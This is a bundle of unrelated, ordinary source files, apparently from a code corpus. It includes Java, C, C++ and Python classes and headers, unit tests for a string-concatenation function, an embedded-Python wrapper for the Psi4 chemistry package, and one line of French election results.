import com.android.annotations.concurrency.UiThread;
import com.android.tools.idea.explorer.fs.DeviceFileSystem;
import org.jetbrains.annotations.NotNull;
import java.util.List;

/**
 * Callbacks fired by the Device Explorer view in response to user actions.
 * All methods are invoked on the UI thread.
 */
@UiThread
public interface DeviceExplorerViewListener {
  /** Invoked when the device selection is cleared. */
  void noDeviceSelected();
  /** Invoked when the user selects {@code device} in the device combo. */
  void deviceSelected(@NotNull DeviceFileSystem device);
  /** Invoked when {@code treeNode} is about to expand (children may need loading). */
  void treeNodeExpanding(@NotNull DeviceFileEntryNode treeNode);
  /** Invoked to open the selected file nodes in the editor. */
  void openNodesInEditorInvoked(@NotNull List<DeviceFileEntryNode> treeNodes);
  /** Invoked to save the selected nodes to a local path chosen by the user. */
  void saveNodesAsInvoked(@NotNull List<DeviceFileEntryNode> treeNodes);
  /** Invoked to copy the device-side paths of the selected nodes to the clipboard. */
  void copyNodePathsInvoked(@NotNull List<DeviceFileEntryNode> treeNodes);
  /** Invoked to create a new directory under {@code parentTreeNode}. */
  void newDirectoryInvoked(@NotNull DeviceFileEntryNode parentTreeNode);
  /** Invoked to create a new file under {@code parentTreeNode}. */
  void newFileInvoked(@NotNull DeviceFileEntryNode parentTreeNode);
  /** Invoked to delete the selected nodes on the device. */
  void deleteNodesInvoked(@NotNull List<DeviceFileEntryNode> nodes);
  /** Invoked to refresh the selected nodes from the device. */
  void synchronizeNodesInvoked(@NotNull List<DeviceFileEntryNode> nodes);
  /** Invoked to upload local files into the directory {@code treeNode}. */
  void uploadFilesInvoked(@NotNull DeviceFileEntryNode treeNode);
}
463
301
//******************************************************************
//
// Copyright 2015 Samsung Electronics All Rights Reserved.
//
//-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//      http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#ifndef EASYSETUP_ENROLLEE_H__
#define EASYSETUP_ENROLLEE_H__

#include "escommon.h"
#include "ESEnrolleeCommon.h"

/**
 * @file
 *
 * This file contains the Enrollee-side Easy Setup APIs.
 */

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/**
 * A function pointer for registering a user-defined function to set user-specific properties to a
 * response going back to a client.
 * @param payload Represents a response. You can set a specific value with a specific property key
 *        to the payload. If a client receives the response and knows the property key, then it can
 *        extract the value.
 * @param resourceType Used to distinguish which resource the received property belongs to.
 */
typedef void (*ESWriteUserdataCb)(OCRepPayload* payload, char* resourceType);

/**
 * A function pointer for registering a user-defined function to parse user-specific properties from
 * a received POST request.
 * @param payload Represents a received POST request. If you know a user-specific property key,
 *        then you can extract a corresponding value if it exists.
 * @param resourceType Used to distinguish which resource the received property belongs to.
 * @param userdata User-specific data you want to deliver to desired users, i.e. the application.
 *        The user should know the data structure of the passed userdata.
 */
typedef void (*ESReadUserdataCb)(OCRepPayload* payload, char* resourceType, void** userdata);

/**
 * This function initializes the Easy Setup. This API must be called prior to invoking any other API.
 *
 * @param isSecured True if the Enrollee is operating in secured mode.
 * @param resourceMask Provisioning resource type which the application wants to create.
 *        ES_WIFICONF_RESOURCE = 0x01,
 *        ES_COAPCLOUDCONF_RESOURCE = 0x02,
 *        ES_DEVCONF_RESOURCE = 0x04
 * @param callbacks ESProvisioningCallbacks for updating Easy Setup resources' data to the application.
 * @return ::ES_OK on success, some other value upon failure.
 */
ESResult ESInitEnrollee(bool isSecured, ESResourceMask resourceMask, ESProvisioningCallbacks callbacks);

/**
 * This function sets device information.
 *
 * @param deviceProperty Contains device information composed of the WiFiConf structure & DevConf structure.
 * @return ::ES_OK on success, some other value upon failure.
 *
 * @see ESDeviceProperty
 */
ESResult ESSetDeviceProperty(ESDeviceProperty *deviceProperty);

/**
 * This function sets the Enrollee's state.
 *
 * @param esState Contains the current Enrollee state.
 * @return ::ES_OK on success, some other value upon failure.
 *
 * @see ESEnrolleeState
 */
ESResult ESSetState(ESEnrolleeState esState);

/**
 * This function sets the Enrollee's error code.
 *
 * @param esErrCode Contains the Enrollee's error code.
 * @return ::ES_OK on success, some other value upon failure.
 *
 * @see ESErrorCode
 */
ESResult ESSetErrorCode(ESErrorCode esErrCode);

/**
 * This function performs termination of all Easy Setup resources.
 *
 * @return ::ES_OK on success, some other value upon failure.
 */
ESResult ESTerminateEnrollee(void);

/**
 * This function sets two function pointers to handle user-specific properties in an incoming
 * POST request and in an outgoing response for a GET or POST request.
 * If you register certain functions with this API, you have to handle the OCRepPayload structure to
 * set and get the properties you want.
 *
 * @param readCb a callback for parsing properties from a POST request
 * @param writeCb a callback for putting properties into a response to be sent
 *
 * @return ::ES_OK on success, some other value upon failure.
 *
 * @see ESReadUserdataCb
 * @see ESWriteUserdataCb
 */
ESResult ESSetCallbackForUserdata(ESReadUserdataCb readCb, ESWriteUserdataCb writeCb);

#ifdef __cplusplus
}
#endif // __cplusplus

#endif /* EASYSETUP_ENROLLEE_H__ */
1,339
1,520
from __future__ import with_statement
from __future__ import absolute_import
#typing

import json
import logging

#overrides

from allennlp.common.file_utils import cached_path
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.fields import Field, TextField, LabelField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer
from allennlp.data.tokenizers import Tokenizer, WordTokenizer
from io import open

logger = logging.getLogger(__name__)  # pylint: disable=invalid-name


class SnliReader(DatasetReader):
    u"""
    Reads a file from the Stanford Natural Language Inference (SNLI) dataset.  This data is
    formatted as jsonl, one json-formatted instance per line.  The keys in the data are
    "gold_label", "sentence1", and "sentence2".  We convert these keys into fields named "label",
    "premise" and "hypothesis", along with a metadata field containing the tokenized strings of the
    premise and hypothesis.

    Parameters
    ----------
    tokenizer : ``Tokenizer``, optional (default=``WordTokenizer()``)
        We use this ``Tokenizer`` for both the premise and the hypothesis.  See :class:`Tokenizer`.
    token_indexers : ``Dict[str, TokenIndexer]``, optional (default=``{"tokens": SingleIdTokenIndexer()}``)
        We similarly use this for both the premise and the hypothesis.  See :class:`TokenIndexer`.
    """
    def __init__(self, tokenizer=None, token_indexers=None, lazy=False):
        super(SnliReader, self).__init__(lazy)
        # Fall back to the library defaults when the caller does not supply
        # a tokenizer / token indexer configuration.
        self._tokenizer = tokenizer or WordTokenizer()
        self._token_indexers = token_indexers or {u'tokens': SingleIdTokenIndexer()}

    #overrides
    def _read(self, file_path):
        # if `file_path` is a URL, redirect to the cache
        file_path = cached_path(file_path)

        with open(file_path, u'r') as snli_file:
            logger.info(u"Reading SNLI instances from jsonl dataset at: %s", file_path)
            for line in snli_file:
                example = json.loads(line)

                label = example[u"gold_label"]
                if label == u'-':
                    # These were cases where the annotators disagreed; we'll just skip them.  It's
                    # like 800 out of 500k examples in the training data.
                    continue

                premise = example[u"sentence1"]
                hypothesis = example[u"sentence2"]
                # Yield lazily so large datasets are not materialized at once.
                yield self.text_to_instance(premise, hypothesis, label)

    #overrides
    def text_to_instance(self,  # type: ignore
                         premise,
                         hypothesis,
                         label=None):
        # pylint: disable=arguments-differ
        # Builds a single Instance; `label` is optional so this can also be
        # used at prediction time when no gold label is available.
        fields = {}
        premise_tokens = self._tokenizer.tokenize(premise)
        hypothesis_tokens = self._tokenizer.tokenize(hypothesis)
        fields[u'premise'] = TextField(premise_tokens, self._token_indexers)
        fields[u'hypothesis'] = TextField(hypothesis_tokens, self._token_indexers)
        if label:
            fields[u'label'] = LabelField(label)
        # Raw token strings are preserved in metadata for downstream display/debugging.
        metadata = {u"premise_tokens": [x.text for x in premise_tokens],
                    u"hypothesis_tokens": [x.text for x in hypothesis_tokens]}
        fields[u"metadata"] = MetadataField(metadata)
        return Instance(fields)

# Python-2-compatible equivalent of the @DatasetReader.register(u"snli") decorator.
SnliReader = DatasetReader.register(u"snli")(SnliReader)
1,539
337
// Test fixture: presumably exercises calling the Kotlin top-level function
// `foo` (compiled into ChangeReceiverBeforeKt) from Java -- TODO confirm
// against the surrounding test harness.
class J {
    void test() {
        ChangeReceiverBeforeKt.foo(new X(0), "1", 2);
    }
}
57
362
package net.ripe.db.whois.common;

import org.apache.commons.lang.StringUtils;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

/**
 * Claims one of up to {@link #MAX_INSTANCES} instance slots under a base directory by
 * atomically creating a {@code lock} file inside a per-instance subdirectory
 * ({@code <baseDir>/<prefix><i>/lock}). The first free slot wins; the acquired
 * instance name is exposed via {@link #getInstanceName()}.
 *
 * <p>Not thread-safe: each instance of this class is expected to be used by a
 * single owner.
 */
public class InstanceLock {

    private final static int MAX_INSTANCES = 16;
    private final static String LOCK_FILE_NAME = "lock";

    private final String instanceNamePrefix;
    private Path lockFile;
    private String instanceName;

    /**
     * Acquires an instance lock immediately.
     *
     * @param baseDir existing directory under which instance subdirectories live
     * @param instanceNamePrefix prefix for instance names, e.g. {@code "whois-"}
     * @throws IllegalStateException if arguments are missing, the base directory
     *         does not exist, or no free slot could be claimed
     */
    public InstanceLock(final String baseDir, final String instanceNamePrefix) {
        if (StringUtils.isEmpty(baseDir)) {
            throw new IllegalStateException("Base directory has not been set");
        }
        if (StringUtils.isEmpty(instanceNamePrefix)) {
            throw new IllegalStateException("Instance name prefix has not been set");
        }

        final Path base = Path.of(baseDir);
        if (!Files.isDirectory(base)) {
            throw new IllegalStateException(String.format("Base directory %s does not exist", baseDir));
        }

        this.instanceNamePrefix = instanceNamePrefix;
        obtain(base);
    }

    private void obtain(final Path base) {
        // Try slots 1..MAX_INSTANCES inclusive. (The original `i < MAX_INSTANCES`
        // was an off-by-one that silently left the last slot unusable.)
        for (int i = 1; i <= MAX_INSTANCES; i++) {
            try {
                final String candidateName = instanceNamePrefix + i;
                final Path instanceDir = base.resolve(Path.of(candidateName));

                if (!Files.isDirectory(instanceDir)) {
                    Files.createDirectory(instanceDir);
                }

                lockFile = instanceDir.resolve(LOCK_FILE_NAME);
                // The exists() check is an optimisation only; createFile() is the
                // atomic claim and throws if another process won the race.
                if (!Files.exists(lockFile)) {
                    Files.createFile(lockFile);
                    this.instanceName = candidateName;
                    return;
                }
            } catch (IOException ioe) {
                // Slot could not be claimed (e.g. lost a creation race); try the next one.
                lockFile = null;
            }
        }
        throw new IllegalStateException("Could not acquire instance lock file");
    }

    /** @return the acquired instance name, or {@code null} after {@link #release()}. */
    public String getInstanceName() {
        return instanceName;
    }

    /**
     * Releases the lock by deleting the lock file. Idempotent: calling this when
     * no lock is held (never acquired, or already released) is a no-op.
     * (The original dereferenced a null {@code lockFile} on double release.)
     */
    public void release() {
        if (lockFile == null) {
            return;
        }
        try {
            Files.deleteIfExists(lockFile);
            lockFile = null;
            instanceName = null;
        } catch (IOException ioe) {
            throw new IllegalStateException(String.format("Failed to delete lock file %s", lockFile), ioe);
        }
    }
}
1,003
3,269
# Time:  O(m * n)
# Space: O(m * n)

import collections


class Solution(object):
    def maxEqualRowsAfterFlips(self, matrix):
        """
        :type matrix: List[List[int]]
        :rtype: int

        Two rows can be made all-equal by the same set of column flips iff one
        row equals the other or its bitwise complement. Normalizing each row by
        XOR-ing every cell with the row's first element maps a row and its
        complement to the same key, so the answer is the largest group of rows
        sharing a normalized pattern.
        """
        count = collections.Counter(tuple(x ^ row[0] for x in row)
                                    for row in matrix)
        # Bug fix: `itervalues()` is Python-2-only (AttributeError on Python 3);
        # `values()` behaves identically here on both versions.
        return max(count.values())
218
608
#ifndef ZXING_MULTI_FINDER_PATTERN_FINDER_H
#define ZXING_MULTI_FINDER_PATTERN_FINDER_H

/*
 * Copyright 2011 ZXing authors
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <zxing/qrcode/detector/FinderPattern.h>
#include <zxing/qrcode/detector/FinderPatternFinder.h>
#include <zxing/qrcode/detector/FinderPatternInfo.h>

namespace zxing {
namespace multi {

/**
 * Finder-pattern finder for images that may contain multiple QR codes.
 * Extends the single-code FinderPatternFinder and groups detected finder
 * patterns into per-code triplets.
 */
class MultiFinderPatternFinder : zxing::qrcode::FinderPatternFinder {
  private:
    // Groups all detected finder patterns into triplets, one triplet per
    // candidate QR code.
    std::vector<std::vector<Ref<zxing::qrcode::FinderPattern> > > selectBestPatterns();

    // Tuning thresholds for accepting/grouping patterns; values are defined
    // in the corresponding .cpp file.
    static const float MAX_MODULE_COUNT_PER_EDGE;
    static const float MIN_MODULE_COUNT_PER_EDGE;
    static const float DIFF_MODSIZE_CUTOFF_PERCENT;
    static const float DIFF_MODSIZE_CUTOFF;

  public:
    MultiFinderPatternFinder(Ref<BitMatrix> image, Ref<ResultPointCallback> resultPointCallback);
    virtual ~MultiFinderPatternFinder();
    // Returns one FinderPatternInfo per QR code candidate found in the image.
    virtual std::vector<Ref<zxing::qrcode::FinderPatternInfo> > findMulti(DecodeHints const& hints);
};

}
}

#endif // ZXING_MULTI_FINDER_PATTERN_FINDER_H
544
372
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.transcoder.v1beta1.model; /** * Video cropping configuration. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Transcoder API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class Crop extends com.google.api.client.json.GenericJson { /** * The number of pixels to crop from the bottom. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer bottomPixels; /** * The number of pixels to crop from the left. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer leftPixels; /** * The number of pixels to crop from the right. The default is 0. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer rightPixels; /** * The number of pixels to crop from the top. The default is 0. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private java.lang.Integer topPixels; /** * The number of pixels to crop from the bottom. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getBottomPixels() { return bottomPixels; } /** * The number of pixels to crop from the bottom. The default is 0. * @param bottomPixels bottomPixels or {@code null} for none */ public Crop setBottomPixels(java.lang.Integer bottomPixels) { this.bottomPixels = bottomPixels; return this; } /** * The number of pixels to crop from the left. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getLeftPixels() { return leftPixels; } /** * The number of pixels to crop from the left. The default is 0. * @param leftPixels leftPixels or {@code null} for none */ public Crop setLeftPixels(java.lang.Integer leftPixels) { this.leftPixels = leftPixels; return this; } /** * The number of pixels to crop from the right. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getRightPixels() { return rightPixels; } /** * The number of pixels to crop from the right. The default is 0. * @param rightPixels rightPixels or {@code null} for none */ public Crop setRightPixels(java.lang.Integer rightPixels) { this.rightPixels = rightPixels; return this; } /** * The number of pixels to crop from the top. The default is 0. * @return value or {@code null} for none */ public java.lang.Integer getTopPixels() { return topPixels; } /** * The number of pixels to crop from the top. The default is 0. * @param topPixels topPixels or {@code null} for none */ public Crop setTopPixels(java.lang.Integer topPixels) { this.topPixels = topPixels; return this; } @Override public Crop set(String fieldName, Object value) { return (Crop) super.set(fieldName, value); } @Override public Crop clone() { return (Crop) super.clone(); } }
1,327
1,299
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.tika.parser.microsoft.onenote;

import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Objects;

import org.apache.tika.parser.microsoft.onenote.fsshttpb.util.BitConverter;

/**
 * An "extended" GUID: a {@link GUID} paired with an integer sequence value {@code n}.
 * Instances are ordered by GUID first and by {@code n} second.
 */
public class ExtendedGUID implements Comparable<ExtendedGUID> {
    GUID guid;
    long n;

    public ExtendedGUID() {
    }

    public ExtendedGUID(GUID guid, long n) {
        this.guid = guid;
        this.n = n;
    }

    /** Returns the nil extended GUID: the nil {@link GUID} with {@code n == 0}. */
    public static ExtendedGUID nil() {
        return new ExtendedGUID(GUID.nil(), 0);
    }

    @Override
    public int compareTo(ExtendedGUID other) {
        // Order by GUID first; ties are broken by the sequence number.
        if (guid.equals(other.guid)) {
            return Long.compare(n, other.n);
        }
        return guid.compareTo(other.guid);
    }

    @Override
    public boolean equals(Object o) {
        if (o == this) {
            return true;
        }
        if (o == null || o.getClass() != getClass()) {
            return false;
        }
        final ExtendedGUID that = (ExtendedGUID) o;
        return this.n == that.n && Objects.equals(this.guid, that.guid);
    }

    @Override
    public int hashCode() {
        return Objects.hash(guid, n);
    }

    @Override
    public String toString() {
        return String.format(Locale.US, "%s [%d]", guid, n);
    }

    public GUID getGuid() {
        return guid;
    }

    public ExtendedGUID setGuid(GUID guid) {
        this.guid = guid;
        return this;
    }

    /** Returns the same {@code "<guid> [<n>]"} rendering as {@link #toString()}. */
    public String getExtendedGuidString() {
        return new StringBuilder()
                .append(guid)
                .append(" [")
                .append(n)
                .append(']')
                .toString();
    }

    public long getN() {
        return n;
    }

    public ExtendedGUID setN(long n) {
        this.n = n;
        return this;
    }

    /**
     * This method is used to convert the element of ExtendedGUID object into a byte List.
     *
     * @return Return the byte list which stores the byte information of ExtendedGUID
     */
    public List<Byte> SerializeToByteList() {
        // GUID bytes first, followed by the little-endian bytes of n.
        final List<Byte> serialized = new ArrayList<>(guid.toByteArray());
        for (final byte piece : BitConverter.getBytes(n)) {
            serialized.add(piece);
        }
        return serialized;
    }
}
1,138
4,772
package example.repo;

import example.model.Customer1731;

import java.util.List;

import org.springframework.data.repository.CrudRepository;

/**
 * Spring Data repository for {@link Customer1731} entities keyed by {@link Long} ids.
 * CRUD operations are inherited from {@link CrudRepository}.
 */
public interface Customer1731Repository extends CrudRepository<Customer1731, Long> {

	/** Derived query: all customers whose last name equals {@code lastName}. */
	List<Customer1731> findByLastName(String lastName);
}
95
14,668
// Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef IOS_CHROME_BROWSER_WEB_WEB_NAVIGATION_UTIL_H_ #define IOS_CHROME_BROWSER_WEB_WEB_NAVIGATION_UTIL_H_ #include "components/search_engines/template_url.h" #import "ios/web/public/navigation/navigation_manager.h" #include "ui/base/page_transition_types.h" namespace web { class WebState; } class GURL; namespace web_navigation_util { // Creates a WebLoadParams object for loading |url| with |transition_type|. If // |post_data| is nonnull, the data and content-type of the post data will be // added to the return value as well. web::NavigationManager::WebLoadParams CreateWebLoadParams( const GURL& url, ui::PageTransition transition_type, TemplateURLRef::PostContent* post_data); // Navigates to the previous item on the navigation stack for |web_state|. // |web_state| can't be null. This method is for user initiated navigations as // it logs "Back" user action. void GoBack(web::WebState* web_state); // Navigates to the next item on the navigation stack for |web_state|. // |web_state| can't be null. This method is for user initiated navigations as // it logs "Forward" user action. void GoForward(web::WebState* web_state); } // namespace web_navigation_util #endif // IOS_CHROME_BROWSER_WEB_WEB_NAVIGATION_UTIL_H_
478
348
{"nom":"Auterrive","dpt":"Pyrénées-Atlantiques","inscrits":104,"abs":23,"votants":81,"blancs":5,"nuls":1,"exp":75,"res":[{"panneau":"1","voix":53},{"panneau":"2","voix":22}]}
74
1,450
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */

#include <CUnit/CUnit.h>
#include <guacamole/string.h>

#include <stdlib.h>
#include <string.h>

/**
 * Verify guac_strlcat() behavior when the string fits the buffer without
 * truncation. The return value of each call should be the length of the
 * resulting string. Each resulting string should contain the full result of
 * the concatenation, including null terminator. Each buffer is pre-filled
 * with 0xFF so that the byte just past the terminator can be checked for
 * overrun.
 */
void test_string__strlcat() {

    char buffer[1024];

    /* "Apache " + "Guacamole" -> 16 chars; byte 17 must stay untouched */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "Apache ");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", sizeof(buffer)), 16);
    CU_ASSERT_STRING_EQUAL(buffer, "Apache Guacamole");
    CU_ASSERT_EQUAL(buffer[17], '\xFF');

    /* Appending to an empty destination */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", sizeof(buffer)), 14);
    CU_ASSERT_STRING_EQUAL(buffer, "This is a test");
    CU_ASSERT_EQUAL(buffer[15], '\xFF');

    /* Appending a single character */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "AB");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "X", sizeof(buffer)), 3);
    CU_ASSERT_STRING_EQUAL(buffer, "ABX");
    CU_ASSERT_EQUAL(buffer[4], '\xFF');

    /* Appending an empty string is a no-op on the content */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "X");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "", sizeof(buffer)), 1);
    CU_ASSERT_STRING_EQUAL(buffer, "X");
    CU_ASSERT_EQUAL(buffer[2], '\xFF');

    /* Both strings empty */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "", sizeof(buffer)), 0);
    CU_ASSERT_STRING_EQUAL(buffer, "");
    CU_ASSERT_EQUAL(buffer[1], '\xFF');

}

/**
 * Verify guac_strlcat() behavior when the string must be truncated to fit the
 * buffer. The return value of each call should be the length that would result
 * from concatenating the strings given an infinite buffer, however only as
 * many characters as can fit should be appended to the string within the
 * buffer, and the buffer should be null-terminated.
 */
void test_string__strlcat_truncate() {

    char buffer[1024];

    /* Only 9 bytes available: result is cut after "Apache G" */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "Apache ");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", 9), 16);
    CU_ASSERT_STRING_EQUAL(buffer, "Apache G");
    CU_ASSERT_EQUAL(buffer[9], '\xFF');

    /* Truncation when the destination starts empty */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", 10), 14);
    CU_ASSERT_STRING_EQUAL(buffer, "This is a");
    CU_ASSERT_EQUAL(buffer[10], '\xFF');

    /* Destination already fills the limit: nothing can be appended */
    memset(buffer, 0xFF, sizeof(buffer));
    strcpy(buffer, "This ");
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "is ANOTHER test", 6), 20);
    CU_ASSERT_STRING_EQUAL(buffer, "This ");
    CU_ASSERT_EQUAL(buffer[6], '\xFF');

}

/**
 * Verify guac_strlcat() behavior with zero buffer sizes. The return value of
 * each call should be the size of the input string, while the buffer remains
 * untouched.
 */
void test_string__strlcat_nospace() {

    /* 0-byte buffer plus 1 guard byte (to test overrun) */
    char buffer[1] = { '\xFF' };

    CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", 0), 9);
    CU_ASSERT_EQUAL(buffer[0], '\xFF');

    CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", 0), 14);
    CU_ASSERT_EQUAL(buffer[0], '\xFF');

    CU_ASSERT_EQUAL(guac_strlcat(buffer, "X", 0), 1);
    CU_ASSERT_EQUAL(buffer[0], '\xFF');

    CU_ASSERT_EQUAL(guac_strlcat(buffer, "", 0), 0);
    CU_ASSERT_EQUAL(buffer[0], '\xFF');

}

/**
 * Verify guac_strlcat() behavior with unterminated buffers. With respect to
 * the return value, the length of the string in the buffer should be
 * considered equal to the size of the buffer, however the resulting buffer
 * should not be null-terminated.
 */
void test_string__strlcat_nonull() {

    /* Reference buffer of pure 0xFF: the destination must remain identical */
    char expected[1024];
    memset(expected, 0xFF, sizeof(expected));

    char buffer[1024];

    memset(buffer, 0xFF, sizeof(buffer));
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "Guacamole", 256), 265);
    CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected));

    memset(buffer, 0xFF, sizeof(buffer));
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "This is a test", 37), 51);
    CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected));

    memset(buffer, 0xFF, sizeof(buffer));
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "X", 12), 13);
    CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected));

    memset(buffer, 0xFF, sizeof(buffer));
    CU_ASSERT_EQUAL(guac_strlcat(buffer, "", 100), 100);
    CU_ASSERT_NSTRING_EQUAL(buffer, expected, sizeof(expected));

}
2,031
631
#include "Components/ChemiQ/Psi4Wrapper.h"
#include "Core/Utilities/Tools/QString.h"
#include <math.h>

/* On MSVC debug builds, temporarily drop _DEBUG so Python.h does not link
   against the (often absent) debug Python runtime. */
#if defined(_DEBUG)
#undef _DEBUG
#include <Python.h>
#define _DEBUG
#else
#include <Python.h>
#endif

#include <codecvt>

namespace QPanda {

Psi4Wrapper::Psi4Wrapper()
{

}

/* Starts the embedded Python interpreter and makes chemiq_dir importable.
   On Windows the directory is also installed as the interpreter module
   search path before initialization. */
void Psi4Wrapper::initialize(const std::string &chemiq_dir)
{
#ifdef _MSC_VER
    if (!chemiq_dir.empty())
    {
        /* Py_SetPath needs a wide string; convert UTF-8 -> wchar_t. */
        using convert_typeX = std::codecvt_utf8<wchar_t>;
        std::wstring_convert<convert_typeX, wchar_t> converterX;
        auto w_chemiq_dir = converterX.from_bytes(chemiq_dir);
        Py_SetPath(w_chemiq_dir.c_str());
    }
#endif
    Py_Initialize();

    /* Alter sys path eventment */
    std::string chdir_cmd = std::string("sys.path.append(\"") + chemiq_dir + "\")";
    PyRun_SimpleString("import sys");
    PyRun_SimpleString(chdir_cmd.c_str());
    //PyRun_SimpleString("print(sys.path)");
}

/* Imports psi4_wrapper.py and invokes run_psi4() with the molecule settings
   stored on this object. On success the returned payload is stored in
   m_data; on failure the error text is stored in m_last_error. Returns true
   iff the Python side reported success (status 0). */
bool Psi4Wrapper::run()
{
    auto u_name = PyUnicode_FromString("psi4_wrapper");
    auto module = PyImport_Import(u_name);
    if (module == NULL)
    {
        /* NOTE(review): u_name is not DECREF'd on this early return — a
           small reference leak; confirm and fix alongside the ones below. */
        PyErr_Print();
        m_last_error = "PyImport_Import() return NULL!";
        return false;
    }
    Py_DECREF(u_name);

    auto call_func = PyObject_GetAttrString(module, "run_psi4");
    Py_DECREF(module);
    if (call_func == NULL)
    {
        PyErr_Print();
        m_last_error = "PyObject_GetAttrString() return NULL!";
        return false;
    }

    /* Single positional argument: a dict of molecule/basis settings. */
    auto args = Py_BuildValue(
                "({s:s,s:i,s:i,s:s,s:d})",
                "mol",m_molecule.c_str(),
                "multiplicity", m_multiplicity,
                "charge", m_charge,
                "basis", m_basis.c_str(),
                "EQ_TOLERANCE", m_eq_tolerance);

    auto result = PyObject_Call(call_func, args, NULL);
    if (result == NULL)
    {
        /* NOTE(review): args and call_func leak on this path — confirm. */
        PyErr_Print();
        m_last_error = "PyObject_Call() return NULL!";
        return false;
    }

    /* run_psi4 is expected to return a (status, text) tuple; status 0 means
       success and text is the data, otherwise text is the error message. */
    int success = 1;
    char *value;
    PyArg_ParseTuple(result, "is", &success, &value);
    if (success == 0)
    {
        m_data = std::string(value);
    }
    else
    {
        m_last_error = std::string(value);
    }

    /* value points into result, so copy (above) before releasing it. */
    Py_DECREF(args);
    Py_DECREF(call_func);
    Py_DECREF(result);

    return success == 0;
}

/* Shuts down the embedded interpreter started by initialize(). */
void Psi4Wrapper::finalize()
{
    Py_Finalize();
}

}
1,084
3,976
#!/usr/local/bin/python
# coding=utf-8
